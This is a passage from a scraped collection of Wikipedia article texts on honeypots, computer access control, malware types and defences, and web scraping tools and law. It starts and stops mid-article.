be monitored by using tools such as honeywall, 31 attackers may still be able to use some honeypots as pivot nodes to penetrate production systems. 32 The second risk of honeypots is that they may attract legitimate users due to a lack of communication in large-scale enterprise networks. For example, the security team who applies and monitors the honeypot may not disclose the honeypot location to all users in time due to the lack of communication or the prevention of insider threats. 33 34 "A 'honey net' is a network of high interaction honeypots that simulates a production network and configured such that all activity is monitored, recorded and in a degree, discreetly regulated. -Lance Spitzner, Honeynet Project Two or more honeypots on a network form a honey net. Typically, a honey net is used for monitoring a larger and or more diverse network in which one honeypot may not be sufficient. Honey nets and honeypots are usually implemented as parts of larger network intrusion detection systems. A honey farm is a centralized collection of honeypots and analysis tools. 35 The concept of the honey net first began in 1999 when Lance Spitzner, founder of the Honeynet Project, published the paper "To Build a Honeypot". 36 An early formulation of the concept, called "entrapment", is defined in FIPS 39 (1976) as "the deliberate planting of apparent flaws in a system for the purpose of detecting attempted penetrations or confusing an intruder about which flaws to exploit". 37 The earliest honeypot techniques are described in Clifford Stoll's 1989 book The Cuckoo's Egg. One of the earliest documented cases of the cybersecurity use of a honeypot began in January 1991. On January 7, 1991, while he worked at AT T Bell Laboratories Cheswick observed a criminal hacker, known as a cracker, attempting to obtain a copy of a password file. Cheswick wrote that he and colleagues constructed a "chroot "Jail" (or "roach motel") which allowed them to observe their attacker over a period of several months. 38 In 2017, Dutch police used honeypot techniques to track down users of the darknet market Hansa. The metaphor of a bear being attracted to and stealing honey is common in many traditions, including Germanic, Celtic, and Slavic. A common Slavic word for the bear is medved "honey eater". The tradition of bears stealing honey has been passed down through stories and folklore, especially the well known Winnie the Pooh. 39 40 |
424 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_access_control | In computer security, general access control includes identification, authorization, authentication, access approval, and audit. A more narrow definition of access control would cover only access approval, whereby the system makes a decision to grant or reject an access request from an already authenticated subject, based on what the subject is authorized to access. Authentication and access control are often combined into a single operation, so that access is approved based on successful authentication, or based on an anonymous access token. Authentication methods and tokens include passwords, biometric scans, physical keys, electronic keys and devices, hidden paths, social barriers, and monitoring by humans and automated systems. citation needed In any access-control model, the entities that can perform actions on the system are called subjects, and the entities representing resources to which access may need to be controlled are called objects (see also Access Control Matrix). Subjects and objects should both be considered as software entities, rather than as human users: any human users can only have an effect on the system via the software entities that they control. citation needed Although some systems equate subjects with user IDs, so that all processes started by a user by default have the same authority, this level of control is not fine-grained enough to satisfy the principle of least privilege, and arguably is responsible for the prevalence of malware in such systems (see computer insecurity). citation needed In some models, for example the object-capability model, any software entity can potentially act as both subject and object. citation needed As of 2014 update , access-control models tend to fall into one of two classes: those based on capabilities and those based on access control lists (ACLs). Both capability-based and ACL-based models have mechanisms to allow access rights to be granted to all members of a group of subjects (often the group is itself modeled as a subject). citation needed Access control systems provide the essential services of authorization, identification and authentication (I A), access approval, and accountability where: citation needed Authorization involves the act of defining access-rights for subjects. An authorization policy specifies the operations that subjects are allowed to execute within a system. citation needed Most modern operating systems implement authorization policies as formal sets of permissions that are variations or extensions of three basic types of access: citation needed These rights and permissions are implemented differently in systems based on discretionary access control (DAC) and mandatory access control (MAC). Identification and authentication (I A) is the process of verifying that an identity is bound to the entity that makes an assertion or claim of identity. The I A process assumes that there was an initial validation of the identity, commonly called identity proofing. Various methods of identity proofing are available, ranging from in-person validation using government issued identification, to anonymous methods that allow the claimant to remain anonymous, but known to the system if they return. The method used for identity proofing and validation should provide an assurance level commensurate with the intended use of the identity within the system. Subsequently, the entity asserts an identity together with an authenticator as a means for validation. The only requirements for the identifier is that it must be unique within its security domain. citation needed Authenticators are commonly based on at least one of the following four factors: citation needed Access approval is the function that actually grants or rejects access during operations. 1 During access approval, the system compares the formal representation of the authorization policy with the access request, to determine whether the request shall be granted or rejected. Moreover, the access evaluation can be done online ongoing. 2 Accountability uses such system components as audit trails (records) and logs, to associate a subject with its actions. The information recorded should be sufficient to map the subject to a controlling user. Audit trails and logs are important for citation needed If no one is regularly reviewing your logs and they are not maintained in a secure and consistent manner, they may not be admissible as evidence. citation needed Many systems can generate automated reports, based on certain predefined criteria or thresholds, known as clipping levels. For example, a clipping level may be set to generate a report for the following: citation needed These reports help a system administrator or security administrator to more easily identify possible break-in attempts. Definition of clipping level: 3 a disk's ability to maintain its magnetic properties and hold its content. A high-quality level range is 65 70%; low quality is below 55%. Access control models are sometimes categorized as either discretionary or non-discretionary. The three most widely recognized models are Discretionary Access Control (DAC), Mandatory Access Control (MAC), and Role Based Access Control (RBAC). MAC is non-discretionary. citation needed Discretionary access control (DAC) is a policy determined by the owner of an object. The owner decides who is allowed to access the object, and what privileges they have. Two important concepts in DAC are citation needed Access controls may be discretionary in ACL-based or capability-based access control systems. (In capability-based systems, there is usually no explicit concept of 'owner', but the creator of an object has a similar degree of control over its access policy.) Mandatory access control refers to allowing access to a resource if and only if rules exist that allow a given user to access the resource. It is difficult to manage, but its use is usually justified when used to protect highly sensitive information. Examples include certain government and military information. Management is often simplified (over what is required) if the information can be protected using hierarchical access control, or by implementing sensitivity labels. What makes the method "mandatory" is the use of either rules or sensitivity labels. citation needed Two methods are commonly used for applying mandatory access control: citation needed Few systems implement MAC; XTS 400 and SELinux are examples of systems that do. Role-based access control (RBAC) is an access policy determined by the system, not by the owner. RBAC is used in commercial applications and also in military systems, where multi-level security requirements may also exist. RBAC differs from DAC in that DAC allows users to control access to their resources, while in RBAC, access is controlled at the system level, outside of the user's control. Although RBAC is non-discretionary, it can be distinguished from MAC primarily in the way permissions are handled. MAC controls read and write permissions based on a user's clearance level and additional labels. RBAC controls collections of permissions that may include complex operations such as an e-commerce transaction, or may be as simple as read or write. A role in RBAC can be viewed as a set of permissions. Three primary rules are defined for RBAC: Additional constraints may be applied as well, and roles can be combined in a hierarchy where higher-level roles subsume permissions owned by lower-level sub-roles. Most IT vendors offer RBAC in one or more products. In attribute-based access control (ABAC), 4 5 access is granted not based on the rights of the subject associated with a user after authentication, but based on the attributes of the subject, object, requested operations, and environment conditions against policy, rules, or relationships that describe the allowable operations for a given set of attributes. 6 The user has to prove so-called claims about his or her attributes to the access control engine. An attribute-based access control policy specifies which claims need to be satisfied in order to grant access to an object. For instance the claim could be "older than 18". Any user that can prove this claim is granted access. Users can be anonymous when authentication and identification are not strictly required. One does, however, require means for proving claims anonymously. This can for instance be achieved using anonymous credentials. citation needed XACML (extensible access control markup language) is a standard for attribute-based access control. XACML 3.0 was standardized in January 2013. 7 Traditionally, access has the purpose of restricting access, thus most access control models follow the "default deny principle", i.e. if a specific access request is not explicitly allowed, it will be denied. This behavior might conflict with the regular operations of a system. In certain situations, humans are willing to take the risk that might be involved in violating an access control policy, if the potential benefit that can be achieved outweighs this risk. This need is especially visible in the health-care domain, where a denied access to patient records can cause the death of a patient. Break-Glass (also called break-the-glass) try to mitigate this by allowing users to override access control decision. Break-Glass can either be implemented in an access control specific manner (e.g. into RBAC), 8 or generic (i.e., independent from the underlying access control model). 9 The initialism HBAC stands for "host-based access control". 10 |
425 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Malware | Malware (a portmanteau of malicious software) 1 is any software intentionally designed to cause disruption to a computer, server, client, or computer network, leak private information, gain unauthorized access to information or systems, deprive access to information, or which unknowingly interferes with the user's computer security and privacy. 1 2 3 4 5 Researchers tend to classify malware into one or more sub-types (i.e. computer viruses, worms, Trojan horses, ransomware, spyware, adware, rogue software, wipers and keyloggers). 1 Malware poses serious problems to individuals and businesses on the Internet. 6 7 According to Symantec's 2018 Internet Security Threat Report (ISTR), malware variants number has increased to 669,947,865 in 2017, which is twice as many malware variants as in 2016. 8 Cybercrime, which includes malware attacks as well as other crimes committed by computer, was predicted to cost the world economy US$6 trillion in 2021, and is increasing at a rate of 15% per year. 9 Since 2021, malware has been designed to target computer systems that run critical infrastructure such as the electricity distribution network. 10 The defense strategies against malware differ according to the type of malware but most can be thwarted by installing antivirus software, firewalls, applying regular patches, securing networks from intrusion, having regular backups and isolating infected systems. Malware can be designed to evade antivirus software detection algorithms. 8 The notion of a self-reproducing computer program can be traced back to initial theories about the operation of complex automata. 11 John von Neumann showed that in theory a program could reproduce itself. This constituted a plausibility result in computability theory. Fred Cohen experimented with computer viruses and confirmed Neumann's postulate and investigated other properties of malware such as detectability and self-obfuscation using rudimentary encryption. His 1987 doctoral dissertation was on the subject of computer viruses. 12 The combination of cryptographic technology as part of the payload of the virus, exploiting it for attack purposes was initialized and investigated from the mid 1990s, and includes initial ransomware and evasion ideas. 13 Before Internet access became widespread, viruses spread on personal computers by infecting executable programs or boot sectors of floppy disks. By inserting a copy of itself into the machine code instructions in these programs or boot sectors, a virus causes itself to be run whenever the program is run or the disk is booted. Early computer viruses were written for the Apple II and Mac, but they became more widespread with the dominance of the IBM PC and MS-DOS. The first IBM PC virus in the wild was a boot sector virus dubbed (c)Brain, created in 1986 by the Farooq Alvi brothers in Pakistan. 14 Malware distributors would trick the user into booting or running from an infected device or medium. For example, a virus could make an infected computer add autorunnable code to any USB stick plugged into it. Anyone who then attached the stick to another computer set to autorun from USB would in turn become infected, and also pass on the infection in the same way. 15 Older email software would automatically open HTML email containing potentially malicious JavaScript code. Users may also execute disguised malicious email attachments. The 2018 Data Breach Investigations Report by Verizon, cited by CSO Online, states that emails are the primary method of malware delivery, accounting for 96% of malware delivery around the world. 16 17 The first worms, network-borne infectious programs, originated not on personal computers, but on multitasking Unix systems. The first well-known worm was the Morris worm of 1988, which infected SunOS and VAX BSD systems. Unlike a virus, this worm did not insert itself into other programs. Instead, it exploited security holes (vulnerabilities) in network server programs and started itself running as a separate process. 18 This same behavior is used by today's worms as well. 19 With the rise of the Microsoft Windows platform in the 1990s, and the flexible macros of its applications, it became possible to write infectious code in the macro language of Microsoft Word and similar programs. These macro viruses infect documents and templates rather than applications (executables), but rely on the fact that macros in a Word document are a form of executable code. 20 Many early infectious programs, including the Morris Worm, the first internet worm, were written as experiments or pranks. 21 Today, malware is used by both black hat hackers and governments to steal personal, financial, or business information. 22 23 Today, any device that plugs into a USB port even lights, fans, speakers, toys, or peripherals such as a digital microscope can be used to spread malware. Devices can be infected during manufacturing or supply if quality control is inadequate. 15 Since the rise of widespread broadband Internet access, malicious software has more frequently been designed for profit. Since 2003, the majority of widespread viruses and worms have been designed to take control of users' computers for illicit purposes. 24 Infected "zombie computers" can be used to send email spam, to host contraband data such as child pornography, 25 or to engage in distributed denial-of-service attacks as a form of extortion. 26 Malware is used broadly against government or corporate websites to gather sensitive information, 27 or to disrupt their operation in general. Further, malware can be used against individuals to gain information such as personal identification numbers or details, bank or credit card numbers, and passwords. 28 29 In addition to criminal money-making, malware can be used for sabotage, often for political motives. Stuxnet, for example, was designed to disrupt very specific industrial equipment. There have been politically motivated attacks which spread over and shut down large computer networks, including massive deletion of files and corruption of master boot records, described as "computer killing. Such attacks were made on Sony Pictures Entertainment (25 November 2014, using malware known as Shamoon or W32.Disttrack) and Saudi Aramco (August 2012). 30 31 Malware can be classified in numerous ways, and certain malicious programs may fall into two or more categories simultaneously. 1 Broadly, software can categorised into three types: 32 (i) goodware; (ii) greyware and (iii) malware. A computer virus is software usually hidden within another seemingly innocuous program that can produce copies of itself and insert them into other programs or files, and that usually performs a harmful action (such as destroying data). 33 They have been likened to biological viruses. 3 An example of this is a portable execution infection, a technique, usually used to spread malware, that inserts extra data or executable code into PE files. 34 A computer virus is software that embeds itself in some other executable software (including the operating system itself) on the target system without the user's knowledge and consent and when it is run, the virus is spread to other executable files. A worm is a stand-alone malware software that actively transmits itself over a network to infect other computers and can copy itself without infecting files. These definitions lead to the observation that a virus requires the user to run an infected software or operating system for the virus to spread, whereas a worm spreads itself. 35 Once malicious software is installed on a system, it is essential that it stays concealed, to avoid detection. Software packages known as rootkits allow this concealment, by modifying the host's operating system so that the malware is hidden from the user. Rootkits can prevent a harmful process from being visible in the system's list of processes, or keep its files from being read. 36 Some types of harmful software contain routines to evade identification and or removal attempts, not merely to hide themselves. An early example of this behavior is recorded in the Jargon File tale of a pair of programs infesting a Xerox CP-V time sharing system: Each ghost-job would detect the fact that the other had been killed, and would start a new copy of the recently stopped program within a few milliseconds. The only way to kill both ghosts was to kill them simultaneously (very difficult) or to deliberately crash the system. 37 A backdoor is a broad term for a computer program that allows an attacker persistent unauthorised remote access to a victim's machine often without their knowledge. 38 The attacker typically uses another attack (such as a trojan, worm or virus) to bypass authentication mechanisms usually over an unsecured network such as the Internet to install the backdoor application. A backdoor can also be a side effect of a software bug in legitimate software that is exploited by an attacker to gain access to a victim's computer or network. The idea has often been suggested that computer manufacturers preinstall backdoors on their systems to provide technical support for customers, but this has never been reliably verified. It was reported in 2014 that US government agencies had been diverting computers purchased by those considered "targets" to secret workshops where software or hardware permitting remote access by the agency was installed, considered to be among the most productive operations to obtain access to networks around the world. 39 Backdoors may be installed by Trojan horses, worms, implants, or other methods. 40 41 A Trojan horse misrepresents itself to masquerade as a regular, benign program or utility in order to persuade a victim to install it. A Trojan horse usually carries a hidden destructive function that is activated when the application is started. The term is derived from the Ancient Greek story of the Trojan horse used to invade the city of Troy by stealth. 42 43 Trojan horses are generally spread by some form of social engineering, for example, where a user is duped into executing an email attachment disguised to be unsuspicious, (e.g., a routine form to be filled in), or by drive-by download. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller (phoning home) which can then have unauthorized access to the affected computer, potentially installing additional software such as a keylogger to steal confidential information, cryptomining software or adware to generate revenue to the operator of the trojan. 44 While Trojan horses and backdoors are not easily detectable by themselves, computers may appear to run slower, emit more heat or fan noise due to heavy processor or network usage, as may occur when cryptomining software is installed. Cryptominers may limit resource usage and or only run during idle times in an attempt to evade detection. Unlike computer viruses and worms, Trojan horses generally do not attempt to inject themselves into other files or otherwise propagate themselves. 45 In spring 2017, Mac users were hit by the new version of Proton Remote Access Trojan (RAT) 46 trained to extract password data from various sources, such as browser auto-fill data, the Mac-OS keychain, and password vaults. 47 Droppers are a sub-type of Trojans that solely aim to deliver malware upon the system that they infect with the desire to subvert detection through stealth and a light payload. 48 It is important not to confuse a dropper with a loader or stager. A loader or stager will merely load an extension of the malware (for example a collection of malicious functions through reflective dynamic link library injection) into memory. The purpose is to keep the initial stage light and undetectable. A dropper merely downloads further malware to the system. Ransomware prevents a user from accessing their files until a ransom is paid. There are two variations of ransomware, being crypto ransomware and locker ransomware. 49 Locker ransomware just locks down a computer system without encrypting its contents, whereas crypto ransomware locks down a system and encrypts its contents. For example, programs such as CryptoLocker encrypt files securely, and only decrypt them on payment of a substantial sum of money. 50 Lock-screens, or screen lockers is a type of "cyber police" ransomware that blocks screens on Windows or Android devices with a false accusation in harvesting illegal content, trying to scare the victims into paying up a fee. 51 Jisut and SLocker impact Android devices more than other lock-screens, with Jisut making up nearly 60 percent of all Android ransomware detections. 52 Encryption-based ransomware, like the name suggests, is a type of ransomware that encrypts all files on an infected machine. These types of malware then display a pop-up informing the user that their files have been encrypted and that they must pay (usually in Bitcoin) to recover them. Some examples of encryption-based ransomware are CryptoLocker and WannaCry. 53 Some malware is used to generate money by click fraud, making it appear that the computer user has clicked an advertising link on a site, generating a payment from the advertiser. It was estimated in 2012 that about 60 to 70% of all active malware used some kind of click fraud, and 22% of all ad-clicks were fraudulent. 54 Grayware is any unwanted application or file that can worsen the performance of computers and may cause security risks but which there is insufficient consensus or data to classify them as malware. 32 Types of greyware typically includes spyware, adware, fraudulent dialers, joke programs ("jokeware") and remote access tools. 38 For example, at one point, Sony BMG compact discs silently installed a rootkit on purchasers' computers with the intention of preventing illicit copying. 55 Potentially unwanted programs (PUPs) are applications that would be considered unwanted despite often being intentionally downloaded by the user. 56 PUPs include spyware, adware, and fraudulent dialers. Many security products classify unauthorised key generators as PUPs, although they frequently carry true malware in addition to their ostensible purpose. 57 In fact, Kammerstetter et al. (2012) 57 estimated that as much as 55% of key generators could contain malware and that about 36% malicious key generators were not detected by antivirus software. Some types of adware turn off anti-malware and virus protection; technical remedies are available. 58 Programs designed to monitor users' web browsing, display unsolicited advertisements, or redirect affiliate marketing revenues are called spyware. Spyware programs do not spread like viruses; instead they are generally installed by exploiting security holes. They can also be hidden and packaged together with unrelated user-installed software. 59 The Sony BMG rootkit was intended to prevent illicit copying; but also reported on users' listening habits, and unintentionally created extra security vulnerabilities. 55 Antivirus software typically uses two techniques to detect malware: (i) static analysis and (ii) dynamic heuristic analysis. 60 Static analysis involves studying the software code of a potentially malicious program and producing a signature of that program. This information is then used to compare scanned files by an antivirus program. Because this approach is not useful for malware that has not yet been studied, antivirus software can use dynamic analysis to monitor how the program runs on a computer and block it if it performs unexpected activity. The aim of any malware is to conceal itself from detection by users or antivirus software. 1 Detecting potential malware is difficult for two reasons. The first is that it is difficult to determine if software is malicious. 32 The second is that malware uses technical measures to make it more difficult to detect it. 60 An estimated 33% of malware is not detected by antivirus software. 57 The most commonly employed anti-detection technique involves encrypting the malware payload in order to prevent antivirus software from recognizing the signature. 32 Tools such as crypters come with an encrypted blob of malicious code and a decryption stub. The stub decrypts the blob and loads it into memory. Because antivirus does not typically scan memory and only scans files on the drive, this allows the malware to evade detection. Advanced malware has the ability to transform itself into different variations, making it less likely to be detected due to the differences in its signatures. This is known as polymorphic malware. Other common techniques used to evade detection include, from common to uncommon: 61 (1) evasion of analysis and detection by fingerprinting the environment when executed; 62 (2) confusing automated tools' detection methods. This allows malware to avoid detection by technologies such as signature-based antivirus software by changing the server used by the malware; 61 (3) timing-based evasion. This is when malware runs at certain times or following certain actions taken by the user, so it executes during certain vulnerable periods, such as during the boot process, while remaining dormant the rest of the time; (4) obfuscating internal data so that automated tools do not detect the malware; 63 (v) information hiding techniques, namely stegomalware; 64 and (5) fileless malware which runs within memory instead of using files and utilizes existing system tools to carry out malicious acts. The use of existing binaries to carry out malicious activities is a technique known as LotL, or Living off the Land. 65 This reduces the amount of forensic artifacts available to analyze. Recently these types of attacks have become more frequent with a 432% increase in 2017 and makeup 35% of the attacks in 2018. Such attacks are not easy to perform but are becoming more prevalent with the help of exploit-kits. 66 67 A vulnerability is a weakness, flaw or software bug in an application, a complete computer, an operating system, or a computer network that is exploited by malware to bypass defences or gain privileges it requires to run. For example, TestDisk 6.4 or earlier contained a vulnerability that allowed attackers to inject code into Windows. 68 Malware can exploit security defects (security bugs or vulnerabilities) in the operating system, applications (such as browsers, e.g. older versions of Microsoft Internet Explorer supported by Windows XP 69 ), or in vulnerable versions of browser plugins such as Adobe Flash Player, Adobe Acrobat or Reader, or Java SE. 70 71 For example, a common method is exploitation of a buffer overrun vulnerability, where software designed to store data in a specified region of memory does not prevent more data than the buffer can accommodate from being supplied. Malware may provide data that overflows the buffer, with malicious executable code or data after the end; when this payload is accessed it does what the attacker, not the legitimate software, determines. Malware can exploit recently discovered vulnerabilities before developers have had time to release a suitable patch. 6 Even when new patches addressing the vulnerability have been released, they may not necessarily be installed immediately, allowing malware to take advantage of systems lacking patches. Sometimes even applying patches or installing new versions does not automatically uninstall the old versions. There are several ways the users can stay informed and protected from security vulnerabilities in software. Software providers often announce updates that address security issues. 72 Common vulnerabilities are assigned unique identifiers (CVE IDs) and listed in public databases like the National Vulnerability Database. Tools like Secunia PSI, 73 free for personal use, can scan a computer for outdated software with known vulnerabilities and attempt to update them. Firewalls and intrusion prevention systems can monitor the network traffic for suspicious activity that might indicate an attack. 74 Users and programs can be assigned more privileges than they require, and malware can take advantage of this. For example, of 940 Android apps sampled, one third of them asked for more privileges than they required. 75 Apps targeting the Android platform can be a major source of malware infection but one solution is to use third-party software to detect apps that have been assigned excessive privileges. 76 Some systems allow all users to make changes to the core components or settings of the system, which is considered over-privileged access today. This was the standard operating procedure for early microcomputer and home computer systems, where there was no distinction between an administrator or root, and a regular user of the system. In some systems, non-administrator users are over-privileged by design, in the sense that they are allowed to modify internal structures of the system. In some environments, users are over-privileged because they have been inappropriately granted administrator or equivalent status. 77 This can be because users tend to demand more privileges than they need, so often end up being assigned unnecessary privileges. 78 Some systems allow code executed by a user to access all rights of that user, which is known as over-privileged code. This was also standard operating procedure for early microcomputer and home computer systems. Malware, running as over-privileged code, can use this privilege to subvert the system. Almost all currently popular operating systems, and also many scripting applications allow code too many privileges, usually in the sense that when a user executes code, the system allows that code all rights of that user. citation needed A credential attack occurs when a user account with administrative privileges is cracked and that account is used to provide malware with appropriate privileges. 79 Typically, the attack succeeds because the weakest form of account security is used, which is typically a short password that can be cracked using a dictionary or brute force attack. Using strong passwords and enabling two-factor authentication can reduce this risk. With the latter enabled, even if an attacker can crack the password, they cannot use the account without also having the token possessed by the legitimate user of that account. Homogeneity can be a vulnerability. For example, when all computers in a network run the same operating system, upon exploiting one, one worm can exploit them all: 80 In particular, Microsoft Windows or Mac OS X have such a large share of the market that an exploited vulnerability concentrating on either operating system could subvert a large number of systems. It is estimated that approximately 83% of malware infections between January and March 2020 were spread via systems running Windows 10. 81 This risk is mitigated by segmenting the networks into different subnetworks and setting up firewalls to block traffic between them. 82 83 Anti-malware (sometimes also called antivirus) programs block and remove some or all types of malware. For example, Microsoft Security Essentials (for Windows XP, Vista, and Windows 7) and Windows Defender (for Windows 8, 10 and 11) provides real-time protection. The Windows Malicious Software Removal Tool removes malicious software from the system. 84 Additionally, several capable antivirus software programs are available for free download from the Internet (usually restricted to non-commercial use). 85 Tests found some free programs to be competitive with commercial ones. 85 86 87 Typically, antivirus software can combat malware in the following ways: A specific component of anti-malware software, commonly referred to as an on-access or real-time scanner, hooks deep into the operating system's core or kernel and functions in a manner similar to how certain malware itself would attempt to operate, though with the user's informed permission for protecting the system. Any time the operating system accesses a file, the on-access scanner checks if the file is infected or not. Typically, when an infected file is found, execution is stopped and the file is quarantined to prevent further damage with the intention to prevent irreversible system damage. Most AVs allow users to override this behaviour. This can have a considerable performance impact on the operating system, though the degree of impact is dependent on how many pages it creates in virtual memory. 91 Sandboxing is a security model that confines applications within a controlled environment, restricting their operations to authorized "safe" actions and isolating them from other applications on the host. It also limits access to system resources like memory and the file system to maintain isolation. 89 Browser sandboxing is a security measure that isolates web browser processes and tabs from the operating system to prevent malicious code from exploiting vulnerabilities. It helps protect against malware, zero-day exploits, and unintentional data leaks by trapping potentially harmful code within the sandbox. It involves creating separate processes, limiting access to system resources, running web content in isolated processes, monitoring system calls, and memory constraints. Inter-process communication (IPC) is used for secure communication between processes. Escaping the sandbox involves targeting vulnerabilities in the sandbox mechanism or the operating system's sandboxing features. 90 92 While sandboxing is not foolproof, it significantly reduces the attack surface of common threats. Keeping browsers and operating systems updated is crucial to mitigate vulnerabilities. 90 92 Website vulnerability scans check the website, detect malware, may note outdated software, and may report known security issues, in order to reduce the risk of the site being compromised. Structuring a network as a set of smaller networks, and limiting the flow of traffic between them to that known to be legitimate, can hinder the ability of infectious malware to replicate itself across the wider network. Software-defined networking provides techniques to implement such controls. As a last resort, computers can be protected from malware, and the risk of infected computers disseminating trusted information can be greatly reduced by imposing an "air gap" (i.e. completely disconnecting them from all other networks) and applying enhanced controls over the entry and exit of software and data from the outside world. However, malware can still cross the air gap in some situations, not least due to the need to introduce software into the air-gapped network and can damage the availability or integrity of assets thereon. Stuxnet is an example of malware that is introduced to the target environment via a USB drive, causing damage to processes supported on the environment without the need to exfiltrate data. AirHopper, 93 BitWhisper, 94 GSMem 95 and Fansmitter 96 are four techniques introduced by researchers that can leak data from air-gapped computers using electromagnetic, thermal and acoustic emissions. Utilizing bibliometric analysis, the study of malware research trends from 2005 to 2015, considering criteria such as impact journals, highly cited articles, research areas, number of publications, keyword frequency, institutions, and authors, revealed an annual growth rate of 34.1%. North America led in research output, followed by Asia and Europe. China and India were identified as emerging contributors. 97 |
426 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#United_States | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not 